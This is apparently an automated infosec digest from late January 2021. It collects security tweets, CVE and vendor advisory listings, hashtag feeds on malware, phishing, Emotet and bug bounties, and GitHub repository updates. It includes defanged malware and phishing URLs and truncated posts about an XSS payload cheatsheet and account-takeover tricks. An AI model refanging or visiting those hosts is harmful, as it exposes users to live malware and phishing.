SBousseaden: example of process execution flow resulting from a VisualStudio PreBuildEvent (Post as well) command execution https://t.co/L58JYXHIs2 https://t.co/QJ1ypstPCi

SBousseaden: a good example of why it's important to always try to catch/capture clean-up state for known key techniques. https://t.co/yGwY6HoF4U

424f424f: @strandjs A big BBS

lazyactivist192: @BrittonCallie @Statebird2 @leahmcelrath @gtconway3d Ooof read the room

lazyactivist192: @IndigenousX The hurons. The iroquois league decimated huronia as punishment for accepting refugees who sided with the french (and against the iroquois).

cyber__sloth: @TheHackersNews Never save credentials on your browser, if your computer gets infected with a stealer, all are gone. Always use password manager and 2FA

FewAtoms: #malware #infosecurity #threathunting #cybersecurity #opendir hxxp://minishop.in/shop/22601600012/ @abuse_ch @James_inthe_box https://t.co/qJMppatRMw

FewAtoms: @jstrosch @James_inthe_box @JAMESWT_MHT may be related: hxxp://91.219.61.224/my/ https://t.co/rAIiSx7qNS

FewAtoms: #malware #opendir #infosecurity #threathunting #cybersecurity hxxp://tunedinblog.com/wp-includes/?C=M;O=D https://t.co/YF3Cc3o5Tu

reecdeep: @VirITeXplorer @58_158_177_102 @csirt_it @AgidCert @guelfoweb @JAMESWT_MHT @FBussoletti ⚙️https://t.co/vTqYIUpjUs

luc4m: @likethecoins @asfakian I was thinking I was alone 😂😅 Thanks 🙏 https://t.co/HDJuxMS8Zc

3xp0rtblog: @Bank_Security Nicely done, I am in waiting for a new blog-post. And remember poverty breeds crime.

3xp0rtblog: @Bank_Security I am funny to see when Cyber Intelligence companies are searching for workers with native English and Russian in the kit. It's so ridiculous. About Russian. Russian is versatile, therefore emulating is very hard.

----Vulners.com High Sev. Last 3 Days----

CVSS: 6.8 (RHSA-2021:0258) Moderate: cryptsetup security update

CVSS: 7.2 (RHSA-2021:0257) Important: net-snmp security update

CVSS: 7.2 N. Korean Hackers Targeting Security Experts to Steal Undisclosed Researches

CVSS: 7.1 (RHSA-2021:0250) Important: Red Hat JBoss Enterprise Application Platform 7.3.5 security update

CVSS: 7.1 (RHSA-2021:0248) Important: Red Hat JBoss Enterprise Application Platform 7.3.5 security update

CVSS: 7.1 (RHSA-2021:0247) Important: Red Hat JBoss Enterprise Application Platform 7.3.5 security update

CVSS: 7.1 (RHSA-2021:0246) Important: Red Hat JBoss Enterprise Application Platform 7.3.5 security update

CVSS: 6.5 Cisco DNA Center Bug Opens Enterprises to Remote Attack

CVSS: 7.5 Code Injection and Directory Traversal in plexus-utils

CVSS: 6.5 Security Bulletin: NVIDIA Jetson AGX Xavier Series, Jetson Xavier NX, TX1, TX2, Nano and Nano 2GB - January 2021

CVSS: 10.0 openSUSE Security Update : cobbler (openSUSE-2021-46)

CVSS: 6.8 openSUSE Security Update : gimp (openSUSE-2020-2357)

CVSS: 9.3 Fedora 32 : chromium (2021-d9faeff8eb)

CVSS: 6.8 openSUSE Security Update : nodejs10 (openSUSE-2021-65)

CVSS: 9.3 openSUSE Security Update : blosc (openSUSE-2020-2337)

CVSS: 6.8 Fedora 32 : python-pillow (2021-880aa7bd27)

CVSS: 6.8 Debian DSA-4836-1 : openvswitch - security update

CVSS: 7.2 openSUSE Security Update : crmsh (openSUSE-2021-55)

CVSS: 9.3 openSUSE Security Update : xstream (openSUSE-2021-140)

CVSS: 6.8 openSUSE Security Update : slurm_18_08 (openSUSE-2020-2286)

CVSS: 7.2 openSUSE Security Update : crmsh (openSUSE-2021-73)

CVSS: 6.8 GLSA-202101-19 : OpenJDK: Multiple vulnerabilities

CVSS: 7.5 openSUSE Security Update : kitty (openSUSE-2021-25)

CVSS: 6.8 openSUSE Security Update : nodejs12 (openSUSE-2021-64)

CVSS: 6.8 openSUSE Security Update : MozillaFirefox (openSUSE-2020-2318)

CVSS: 7.2 GLSA-202101-21 : Flatpak: Sandbox escape

CVSS: 10.0 openSUSE Security Update : hawk2 (openSUSE-2021-54)

CVSS: 7.5 openSUSE Security Update : python3 (openSUSE-2020-2332)

CVSS: 10.0 openSUSE Security Update : hawk2 (openSUSE-2021-144)

CVSS: 6.8 openSUSE Security Update : gimp (openSUSE-2021-27)

CVSS: 9.3 openSUSE Security Update : chromium (openSUSE-2021-40)

CVSS: 6.8 openSUSE Security Update : MozillaThunderbird (openSUSE-2020-2324)

CVSS: 7.5 openSUSE Security Update : python3 (openSUSE-2020-2333)

CVSS: 6.8 PEAR Archive_Tar Arbitrary File Write

CVSS: 7.2 GLSA-202101-15 : VirtualBox: Multiple vulnerabilities

CVSS: 7.5 FreeBSD : chocolate-doom -- Arbitrary code execution (35aef72c-5c8e-11eb-8309-4ccc6adda413)

CVSS: 7.5 Debian DSA-4837-1 : salt - security update

CVSS: 9.3 openSUSE Security Update : chromium (openSUSE-2021-41)

CVSS: 6.8 GLSA-202101-20 : glibc: Multiple vulnerabilities

CVSS: 6.8 openSUSE Security Update : MozillaFirefox (openSUSE-2020-2325)

CVSS: 6.8 openSUSE Security Update : wavpack (openSUSE-2021-153)

CVSS: 6.8 openSUSE Security Update : nodejs10 (openSUSE-2021-82)

CVSS: 6.8 openSUSE Security Update : wavpack (openSUSE-2021-154)

CVSS: 10.0 Fedora 33 : PyYAML (2021-3342569a0f)

CVSS: 6.8 Debian DSA-4834-1 : vlc - security update

CVSS: 6.8 openSUSE Security Update : MozillaThunderbird (openSUSE-2020-2317)

CVSS: 6.8 openSUSE Security Update : vlc (openSUSE-2021-91)

CVSS: 6.8 openSUSE Security Update : vlc (openSUSE-2021-76)

CVSS: 9.3 openSUSE Security Update : opera (openSUSE-2021-139)

CVSS: 9.3 openSUSE Security Update : opera (openSUSE-2021-138)

CVSS: 7.2 openSUSE Security Update : the Linux Kernel (openSUSE-2021-75)

CVSS: 6.8 openSUSE Security Update : ImageMagick (openSUSE-2021-136)

CVSS: 7.2 openSUSE Security Update : the Linux Kernel (openSUSE-2021-60)

CVSS: 7.8 IBM MQ 8.0.0.6 (293271)

CVSS: 6.8 openSUSE Security Update : webkit2gtk3 (openSUSE-2020-2304)

CVSS: 6.8 SUSE SLES12 Security Update : ImageMagick (SUSE-SU-2021:0199-1)

CVSS: 7.5 MobileIron MDM Hessian-Based Java Deserialization Remote Code Execution

CVSS: 6.8 openSUSE Security Update : webkit2gtk3 (openSUSE-2020-2310)

CVSS: 9.3 openSUSE Security Update : MozillaFirefox (openSUSE-2020-2315)

CVSS: 9.3 openSUSE Security Update : opera (openSUSE-2020-2359)

CVSS: 6.8 openSUSE Security Update : ImageMagick (openSUSE-2021-148)

CVSS: 7.5 openSUSE Security Update : clamav (openSUSE-2020-2276)

CVSS: 7.5 openSUSE Security Update : clamav (openSUSE-2020-2268)

CVSS: 9.3 openSUSE Security Update : opera (openSUSE-2020-2360)

CVSS: 10.0 openSUSE Security Update : hawk2 (openSUSE-2021-147)

CVSS: 10.0 openSUSE Security Update : hawk2 (openSUSE-2021-74)

CVSS: 6.8 openSUSE Security Update : slurm_18_08 (openSUSE-2021-96)

CVSS: 7.5 Ubuntu 16.04 LTS : Pound vulnerabilities (USN-4702-1)

CVSS: 7.5 Pound vulnerabilities

CVSS: 7.5 Beware! Fully-Functional Exploit Released Online for SAP Solution Manager Flaw

----NVD Last 3 Days----

CVE#: CVE-2020-17532 Published Date: 2021-01-25 CVSS: NO CVSS Description: When handler-router component is enabled in servicecomb-java-chassis, authenticated user may inject some data and cause arbitrary code execution.

The problem happens in versions between 2.0.0 ~ 2.1.3 and fixed in Apache ServiceComb-Java-Chassis 2.1.5

CVE#: CVE-2021-21272 Published Date: 2021-01-25 CVSS: NO CVSS Description: ORAS is open source software which enables a way to push OCI Artifacts to OCI Conformant registries. ORAS is both a CLI for initial testing and a Go Module.

In ORAS from version 0.4.0 and before version 0.9.0, there is a "zip-slip" vulnerability.

The directory support feature allows the downloaded gzipped tarballs to be automatically extracted to the user-specified directory where the tarball can have symbolic links and hard links.

A well-crafted tarball or tarballs allow malicious artifact providers linking, writing, or overwriting specific files on the host filesystem outside of the user-specified directory unexpectedly with the same permissions as the user who runs `oras pull`.

Users of the affected versions are impacted if they are `oras` CLI users who run `oras pull`, or if they are Go programs, which invoke `github.com/deislabs/oras/pkg/content.FileStore`.

The problem has been fixed in version 0.9.0.

For `oras` CLI users, there are no workarounds other than pulling from a trusted artifact provider.

For `oras` package users, the workaround is to not use `github.com/deislabs/oras/pkg/content.FileStore`, and use other content stores instead, or pull from a trusted artifact provider.

CVE#: CVE-2021-21275 Published Date: 2021-01-25 CVSS: NO CVSS Description: The MediaWiki "Report" extension has a Cross-Site Request Forgery (CSRF) vulnerability. Before fixed version, there was no protection against CSRF checks on Special:Report, so requests to report a revision could be forged.

The problem has been fixed in commit f828dc6 by making use of MediaWiki edit tokens.

CVE#: CVE-2021-23901 Published Date: 2021-01-25 CVSS: NO CVSS Description: An XML external entity (XXE) injection vulnerability was discovered in the Nutch DmozParser and is known to affect Nutch versions < 1.18. XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. This issue is fixed in Apache Nutch 1.18.

----#MALWARE----

4w4r44: RT @0xthreatintel: Reversing APT Tool : SManager (Unpacked) https://t.co/g22cZgnauL cc: @malwrhunterteam @Arkbird_SOLG @JAMESWT_MHT @Jame…

akawombat42: RT @PhishStats: https://t.co/MAuIXRvYiq detected 48 new websites hosting #phishing | new today: 53 | #infosec #cybersecurity #malware https…

0ct4vian: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity…

FreezoneIsm: RT @TheHackersNews: Watch Out, #Infosec! In an ongoing #cyberattack campaign, North Korean hackers are approaching security experts—workin…

0ct4vian: RT @cybersecboardrm: WHATSAPP users already concerned about privacy policies...have been handed another reason to delete the app - it's bei…

Ericom_Software: This @ZDNet article reports that hackers targeted #cybersecurity researchers through multiple social media profiles… https://t.co/WA541ZVG2p

sectest9: RT @gtbarry: The worldwide cybersecurity market is set to grow by up to 10% this year to top $60bn, as the global economy slowly recovers f…

LisaCalighan: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity…

iotcybersec24: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity…

sectest9: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity…

sectest9: RT @CSA2LLC: Russian hack of US agencies exposed supply chain weaknesses #RussianHackers #SupplyChain #MaliciousCode #Malware #USGovernment…

gtbarry: The worldwide cybersecurity market is set to grow by up to 10% this year to top $60bn, as the global economy slowly… https://t.co/TCn3gx7PpG

CSA2LLC: Russian hack of US agencies exposed supply chain weaknesses #RussianHackers #SupplyChain #MaliciousCode #Malware… https://t.co/Xx714onxDn

keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware… https://t.co/ZZ11hAN4xw

InfoSec_Pom: Free Threat Intelligence feed - https://t.co/q1yOWjgK9G https://t.co/qpXvekqf8u The U.S. wants smartphone location… https://t.co/dqN5pELdkW

----#PHISHING----

akawombat42: RT @PhishStats: https://t.co/MAuIXRvYiq detected 48 new websites hosting #phishing | new today: 53 | #infosec #cybersecurity #malware https…

0ct4vian: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity…

GibbonsMatthew: RT @CyberNews_com: Mobile #phishing #attacks can fool even the smartest of us. But it’s not always greater sophistication that enables succ…

JRoosen: RT @JAMESWT_MHT: #Phishing #webmail login Action Required: ✉ You have [9] quarantined messages http://clickandprints.[com/mail/webmail.ph…

opensource_orgs: RT @StephenMendez_: ❗️Project Announcement❗️ #Wanami: an #opensource web browser focused on preventing high risk, low visibility web based…

StephenMendez_: ❗️Project Announcement❗️ #Wanami: an #opensource web browser focused on preventing high risk, low visibility web b… https://t.co/74v6zYPRTp

LisaCalighan: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity…

iotcybersec24: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity…

sectest9: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity…

TeamDreier: #phishing Bank phishing and brand copycat nest Full dataset (8TB) analysis of NS *.dnspod.com IP reuse and graph p… https://t.co/T0xfiI2U4m

----#OSINT----

chandlertwilson: Looking better in the #UK for now. #OSINT + #machine one-pager on @jlpartnership announcing the early repayment of… https://t.co/EE6jfJKTmT

aleks_caldaras: RT @dutch_osintguy: Thank you @MaltegoHQ for the personal letter and swag! Really appreciated 😃 #osint https://t.co/NItnaMxyhT

WarVsPeaceOrg: #Russia|n #Navy deployments acknowledged by the government as of 24 January 2021. #OSINT #ВМФ… https://t.co/Me6RmrMkUe

dutch_osintguy: Thank you @MaltegoHQ for the personal letter and swag! Really appreciated 😃 #osint https://t.co/NItnaMxyhT

BriTellsStories: RT @osinteditor: Impressive work by community member @searchish_site https://t.co/xmjw2goRVa A comprehensive look into corporate research,…

Knowsint1: RT @OSINTtechniques: 2020 Social Media Map. If you want live links, download here -> https://t.co/6GNky2IpEo #OSINT #SOCMINT https://t.co/Z…

iSecurity: G-HUNT osint tool for extracting information from any Google Account using an email. https://t.co/wgFYxgaO5u #cybersecurity #hacking #osint

A92E: RT @OSINTtechniques: 2020 Social Media Map. If you want live links, download here -> https://t.co/6GNky2IpEo #OSINT #SOCMINT https://t.co/Z…

TRADECRAFT14: RT @VoxCroft: Other than operational intelligence, VoxCroft provides strategic and tactical intelligence to customers through topical analy…

bryanstrawser: RT @DrJoeBurton: Thanks @CHCyberPolicy - great to be part of such an interesting issue covering #CyberSecurity for healthcare, governance o…

pantarheio: RT @Isabella_Regan: Great read on 'How Open Source Experts Identified the US Capitol Rioters ' - now that there's rioting and looting in th…

tcstvns: RT @DrJoeBurton: Thanks @CHCyberPolicy - great to be part of such an interesting issue covering #CyberSecurity for healthcare, governance o…

origolga: RT @InformNapalm: Personal data of LLS Yamal sailors awarded for war crimes in #Crimea and #Syria. https://t.co/z1ImL3wfp8 This #OSINT in…

YarnoRitzen: RT @Isabella_Regan: Great read on 'How Open Source Experts Identified the US Capitol Rioters ' - now that there's rioting and looting in th…

RDSWEB: RT @AaronCTI: #OSINT Query of the day - Does anyone know of any reliable SEO keyword tools that could be leveraged for OSINT purposes? I'm…

----#THREATINTEL----

simonroses: Interesting read -> New campaign targeting security researchers https://t.co/O5ehnkA62G #CyberSecurity #google… https://t.co/FLPqSHTgnq

Proteus_Cyber: Find the right TI tools with our help. #Threatintelligence is a reality, and it can be incredibly damaging if not c… https://t.co/eXQIIDiZZO

Ch33r10: RT @fr0gger_: I updated the @virustotal VTI Dorks repo created by @cyb3rops to include a part for samples similarities! Check this out! #in…

cybsecbot: RT @cahill0701: To all my #SecurityResearcher friends, though I know you already are, be vigilant. Thanks for sharing @Google #ThreatInte…

cahill0701: To all my #SecurityResearcher friends, though I know you already are, be vigilant. Thanks for sharing @Google… https://t.co/Ws0tRvo71p

ninoseki: RT @teamcymru: Team Cymru Research: We have updated our analysis of #GhostDNS to include recently observed attacker infrastructure. https:…

MrsYisWhy: teamcymru: Team Cymru Research: We have updated our analysis of #GhostDNS to include recently observed attacker inf… https://t.co/gb0Rn4eF5X

teamcymru: Team Cymru Research: We have updated our analysis of #GhostDNS to include recently observed attacker infrastructure… https://t.co/92Cm8X9Z7B

valkrider: RT @teamcymru: #Amazon #Kindle RCE Attack Starts with an #Email #threatintel #infosec https://t.co/FCScXkzSEM

cyberreport_io: BlackBerry expands Baidu partnership to take autonomous driving to a higher gear https://t.co/GUxf677nXV… https://t.co/L40ziJZs78

hacking_future: Deloitte & Touche Buys Threat-Hunting Firm https://t.co/yytEnhaGpQ #acquisition #threatintel via @DarkReading

Cyber_APMG: Blog - Using the #darkweb for #Threat Intelligence. Bas van den Berg, from the @SECO_Institute, gives practical tip… https://t.co/mS3Cs1twDs

AllysonTowle: RT @MicroFocusSA: What is cyber #ThreatIntelligence and how does it give businesses a better understanding of past, current, and future cyb…

DeoVolente11: RT @fr0gger_: I updated the @virustotal VTI Dorks repo created by @cyb3rops to include a part for samples similarities! Check this out! #in…

MarkPlant: RT @MicroFocusSA: What is cyber #ThreatIntelligence and how does it give businesses a better understanding of past, current, and future cyb…

----#RANSOMWARE----

0ct4vian: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity…

sectest9: RT @gtbarry: The worldwide cybersecurity market is set to grow by up to 10% this year to top $60bn, as the global economy slowly recovers f…

LisaCalighan: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity…

CyberSecurityN8: RT @ralf_ladner: Morgan Wright, Chief Security Advisor at #Sentinelone, on the lessons learned from the #Sunburst campaign #Cyberdefense #Cyberkrimi…

Mulugah1: RT @MVPWorks: What a nightmare: A ransomware attack forced Baltimore County public schools to close. Did you know that ransomware could do…

iotcybersec24: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity…

ralf_ladner: Morgan Wright, Chief Security Advisor at #Sentinelone, on the lessons learned from the #Sunburst campaign #Cyberdefense… https://t.co/Sanq7Algby

sectest9: RT @keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware #emailsecurity…

MainNerve: Some believe that cyber attackers will change from ransoms to exfiltrating data. https://t.co/ynTHuQ25yO… https://t.co/nDqHCfsI0t

sectest9: RT @MVPWorks: What a nightmare: A ransomware attack forced Baltimore County public schools to close. Did you know that ransomware could do…

MVPWorks: What a nightmare: A ransomware attack forced Baltimore County public schools to close. Did you know that ransomware… https://t.co/6yal28uH5u

ThirdWallPlugin: Combating Ransomware: What the Third Wall Means for You. https://t.co/m86qRhqads #ThirdWall #Cybersecurity… https://t.co/Wqu1lNFE5Y

CyberSecurityN8: RT @ptrancyber: Another #ransomware gang is now using #DDoS #cyberattacks to force a victim to contact them and negotiate a ransom. https:/…

gtbarry: The worldwide cybersecurity market is set to grow by up to 10% this year to top $60bn, as the global economy slowly… https://t.co/TCn3gx7PpG

keepnetlabs: 2020 #Cybersecurity Review https://t.co/XHqv53k0Wf #security #infosecurity #phishing #malware #ransomware… https://t.co/ZZ11hAN4xw

----#OPENDIR----

----#MALSPAM----

vl_sk: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

mansoor_ranchi: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

HerbieZimmerman: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

Securityblog: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

NetRng31: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

hacker3j: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

gh0std4ncer: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

kilijanek: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

dragon199421: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

Cryptolaemus1: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

amoghnagaraj: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

jc_campu: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

InfosecFam: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

JRoosen: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

cybsecbot: RT @malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so…

----#EMOTET----

Giwrgosma: RT @dor0n1: #emotet rocks germany https://t.co/l5aZM2GV4x https://t.co/h6IXzaOJGh .doc anyone?

dor0n1: #emotet rocks germany https://t.co/l5aZM2GV4x https://t.co/h6IXzaOJGh .doc anyone?

gh0std4ncer: RT @sec_soup: Was taking a look at this zipped #Emotet over my lunch break and the password is indeed incorrect. The right password was 'e4…

AntiVirusLV: RT @anyrun_app: TOP10 last week's threats by uploads ⬆️ #Emotet 1547 (954) ⬇️ #NjRAT 282 (320) ⬆️ #FormBook 206 (161) ⬆️ #Remcos 157 (134)…

cybertotz: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

JAMESWT_MHT: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

0x4d_: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

YourAnonRiots: RT @Cryptolaemus1: #Emotet C2 Update as of 2021/01/25: Same T1 C2s we saw change on bots for E2/E3 on Sun are now in distro this morning. E…

KanbeWorks: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

FlohEinstein: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

Paladin3161: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

JRoosen: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

thlnk3r: RT @Cryptolaemus1: #Emotet C2 Update as of 2021/01/25: Same T1 C2s we saw change on bots for E2/E3 on Sun are now in distro this morning. E…

wepIV: RT @AhegaoTony: Anybody getting false positives from Windows Defender for “TrojanDownloader:O97M/Emotet.RR!MTB”? Looks to have started ~3 d…

Myrtus0x0: RT @Cryptolaemus1: #Emotet Daily Summary for 2021/01/25: Ivan started the day off with a bang but went out with a whimper just after noon U…

----#BUGBOUNTY----

Sarim_Razaa: RT @FaniMalikHack: Recon MindMap Recon Master-plan🔥 Recon is usually a preliminary step toward a further attack seeking to exploit the tar…

atluxity: RT @FaniMalikHack: Recon MindMap Recon Master-plan🔥 Recon is usually a preliminary step toward a further attack seeking to exploit the tar…

native_stack: RT @disclosedh1: TTS Bug Bounty disclosed a bug submitted by puppykok: https://t.co/6ZlY4E6Sfk - Bounty: $750 #hackerone #bugbounty https:/…

good_sector: RT @the_vyAdha: #bugbounty #bugbountytips Found a $$$$ RCE with CVE-2018-15473 Steps : 1. Found an IP of the company eg: https://t.co/sH…

yuyhiraka: RT @FaniMalikHack: OAuth 2.0 Hacking Here is a mindmap about hacking OAuth 2.0. cover all possible ways even with low impact. Credit:-@hac…

s0meguy1: RT @AmitMDubey: Making public my XSS cheatsheet which I am been referring from a long time. I have been collecting this payload since I sta…

bypasstp: RT @FaniMalikHack: OAuth 2.0 Hacking Here is a mindmap about hacking OAuth 2.0. cover all possible ways even with low impact. Credit:-@hac…

greyninja9619: RT @sunilyedla2: Found ATO just now! 1. Found Open redirection in sign in endpoint 2. Enter attackers server (I’ve used ngrok server) and t…

trozonsec: RT @naglinagli: Let's have a little recon challenge I have placed 10 unique subdomains on my main blog: https://t.co/Z6IPqT8o8p I wonder i…

ken5scal: RT @FaniMalikHack: OAuth 2.0 Hacking Here is a mindmap about hacking OAuth 2.0. cover all possible ways even with low impact. Credit:-@hac…

john_k57: RT @FaniMalikHack: Recon MindMap Recon Master-plan🔥 Recon is usually a preliminary step toward a further attack seeking to exploit the tar…

ErSurajShukla: RT @sec_r0: Today let's learn diff b/w basic AuthN & session-based AuthN. #web auth made easy. #infosec #security #appsec #webdesign #WebD…

FeliciPierluigi: RT @FaniMalikHack: OAuth 2.0 Hacking Here is a mindmap about hacking OAuth 2.0. cover all possible ways even with low impact. Credit:-@hac…

payloadartist: Lately I have seen a lot of Recon-as-a-Service platforms coming up, @SpyseHQ really stands out as a #cybersecurity… https://t.co/kmtcaJqpRZ

abh1sek_r: RT @FaniMalikHack: Recon MindMap Recon Master-plan🔥 Recon is usually a preliminary step toward a further attack seeking to exploit the tar…

----#CYBERCRIME----

MoreyHaber: RT @BeyondTrust: As the Covid-19 pandemic enters what may be its most dangerous phase, how can healthcare organisations fight increased cyb…

sectest9: RT @anuragbaghla: Got invited by PTC News for the *Panel Discussion* on use of Smartphones by Gangsters in Punjab (India) jails. https://…

beefyspace: RT @anuragbaghla: Got invited by PTC News for the *Panel Discussion* on use of Smartphones by Gangsters in Punjab (India) jails. https://…

the404code: RT @anuragbaghla: Got invited by PTC News for the *Panel Discussion* on use of Smartphones by Gangsters in Punjab (India) jails. https://…

pdboyes: RT @BeyondTrust: As the Covid-19 pandemic enters what may be its most dangerous phase, how can healthcare organisations fight increased cyb…

NamesOfLondon: #Cybercrime #Security #Internet @Verisign #IoT 👇 Is it Possible to Take Down the Internet https://t.co/g36Z0mNGVT

sectest9: RT @esafetymatters: #Fraud epidemic is now national security threat. @BBCNews tells us more here: https://t.co/kHU7y410Po #CyberCrime #Onl…

ThirdWallPlugin: Combating Ransomware: What the Third Wall Means for You. https://t.co/m86qRhqads #ThirdWall #Cybersecurity… https://t.co/Wqu1lNFE5Y

CyberSecurityN8: RT @esafetymatters: #Fraud epidemic is now national security threat. @BBCNews tells us more here: https://t.co/kHU7y410Po #CyberCrime #Onl…

supplymybiz: #Cybersecurity Risk Calculator - Not sure about the potential exposure to #Cybercrime in your business? Try it FREE… https://t.co/v6uhkEHP7a

CSTG_Omaha: Be careful on what applications that installed on your phone it could cause security issues at the office… https://t.co/nMB0fg1kdd

esafetymatters: #Fraud epidemic is now national security threat. @BBCNews tells us more here: https://t.co/kHU7y410Po #CyberCrime… https://t.co/YF97H9pfl1

DC_CyberProtect: Be it a text message or an email, the NHS is warning people to be vigilant about fake invitations to have the coron… https://t.co/8ehl3PQITz

PentestPeople: Canadian Company "Nefilim" Ransomware Attack Results In Data Leaked On The Dark Web. We hope this gets sorted as s… https://t.co/07WXnAoobX

----Hacking Updates----

gkupsaw updated javascript-raytracer. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-23. --- A raytracer and scene parser implemented in JavaScript (Hack at Brown submission)

e11en updated hack-game. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-24. --- A HTML5 + JS game teaching you how to hack

Sushreesatarupa updated corona_cARe.github.io. This repo has 0 stars and 1 watchers. This repo was created on 2020-11-08. --- TechTogether Boston-WINNER-echoAR Best AR/VR hack-Interactive AR based COVID statistics and information providing web-app with an addictive covid game

Zormayel updated zormayel.github.io. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-24. --- Cybersecurity / Pentesting / Hacking

dead-hosts updated The-Big-List-of-Hacked-Malware-Web-Sites_git_mitchellkrogza. This repo has 6 stars and 2 watchers. This repo was created on 2018-01-10. --- Test of https://github.com/mitchellkrogza/The-Big-List-of-Hacked-Malware-Web-Sites

carlospolop updated hacktricks. This repo has 1744 stars and 99 watchers. This repo was created on 2020-07-15. --- Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.

YasserGersy updated cazador_unr. This repo has 95 stars and 7 watchers. This repo was created on 2019-06-22. --- Hacking tools

Tejas1510 updated Hacking-Scripts. This repo has 31 stars and 0 watchers. This repo was created on 2020-11-05. --- Hacking Scripts contains amazing and awesome scripts written in Python, JavaScript, Java, Nodejs, and more. The main aim of the repository will be to provide utility scripts that might make everyday life easy.

PoorGameDev updated CSI-Hacking. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-26. --- Impress all your "friends" with this fake CSI hacking look-alike...

becored updated RM6_Prac. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-20. --- Rockman 6 (Mega Man 6) practice rom hack for speedrun.

clempat updated enhanced-hackernews. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-23. --- This is THE Best hacker news reader

thaone5866 updated cavehacks-public-release-a-cavegame-hack-. This repo has 1 stars and 1 watchers. This repo was created on 2021-01-19. --- it's the cavegame.io hack!

ujshaw updated Hardware-Hacking. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-26. --- None

Gabriel-Cervo updated 100DaysOfSwift-Project2. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-25. --- Second project in "Hacking With Swift - 100 Days of Swift" course

babbadeckl updated HackTheBox-Writeups. This repo has 0 stars and 1 watchers. This repo was created on 2020-12-31. --- Writeups for Hack The Box machines/challenges

NicolasMuras updated SH4R1NG4N. This repo has 1 stars and 1 watchers. This repo was created on 2020-03-22. --- Platform of ethical hacking tools, info gathering and database management.

avinashkranjan updated Recess. This repo has 0 stars and 1 watchers. This repo was created on 2020-09-05. --- 🚀 MLH- First Day Back Hacks Hackathon... 🤓 Recess - A Social Media Platform for students to share their experience/knowledge they gained in their free time. 🧐

